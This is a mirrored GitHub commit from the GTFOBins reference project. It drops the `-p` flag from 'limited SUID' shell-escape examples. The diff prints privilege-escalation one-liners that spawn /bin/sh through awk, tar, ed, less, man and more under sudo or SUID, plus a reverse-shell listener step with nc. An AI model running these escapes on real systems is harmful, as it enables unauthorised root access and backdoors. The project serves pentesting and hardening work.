mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
Remove the -p option from suid-limited
It is useless because: - if Debian-like, it is not supported and does not drop anyway; - otherwise the `system()`-like function already used a shell that dropped the privileges.
This commit is contained in:
parent
84f48081fb
commit
e885d4a6ee
@ -12,7 +12,7 @@ suid-enabled:
|
|||||||
|
|
||||||
suid-limited:
|
suid-limited:
|
||||||
label: Limited SUID
|
label: Limited SUID
|
||||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems (if that's the case don't use the `-p` option).
|
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems.
|
||||||
|
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
label: Sudo
|
label: Sudo
|
||||||
|
@ -5,7 +5,7 @@ functions:
|
|||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
|
@ -11,5 +11,5 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |-
|
||||||
./ed
|
./ed
|
||||||
!/bin/sh -p
|
!/bin/sh
|
||||||
---
|
---
|
@ -14,5 +14,5 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |-
|
||||||
./less /etc/profile
|
./less /etc/profile
|
||||||
!/bin/sh -p
|
!/bin/sh
|
||||||
---
|
---
|
@ -11,5 +11,5 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |-
|
||||||
./man man
|
./man man
|
||||||
!/bin/sh -p
|
!/bin/sh
|
||||||
---
|
---
|
@ -11,5 +11,5 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |-
|
||||||
TERM= ./more /etc/profile
|
TERM= ./more /etc/profile
|
||||||
!/bin/sh -p
|
!/bin/sh
|
||||||
---
|
---
|
@ -5,5 +5,5 @@ functions:
|
|||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"
|
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh"
|
||||||
---
|
---
|
Loading…
Reference in New Issue
Block a user